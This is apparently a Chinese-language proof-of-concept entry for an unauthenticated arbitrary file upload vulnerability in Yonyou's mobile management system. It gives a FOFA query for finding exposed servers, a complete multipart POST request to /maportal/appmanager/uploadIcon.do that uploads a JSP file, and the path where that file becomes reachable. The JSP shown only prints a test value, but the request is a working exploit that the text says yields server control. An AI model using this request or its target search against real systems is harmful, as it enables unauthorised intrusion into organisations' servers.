Y19-3用友-移动管理系统-文件上传

漏洞描述：

用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 uploadIcon.do 接口存在任意文件上传漏洞，未经授权攻击者通过漏洞上传任意文件，最终可以获取服务器权限。

网站图片:

网络测绘:

fofa语法：

• fofa：app=“用友-移动系统管理”

漏洞复现:

payload：

POST /maportal/appmanager/uploadIcon.do HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 142
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="iconFile"; filename="1.jsp"

<% out.print(123); %>
--00content0boundary00--

效果图:

上传文件位置

http://xx.xx.xx.xx/maupload/img/1.jsp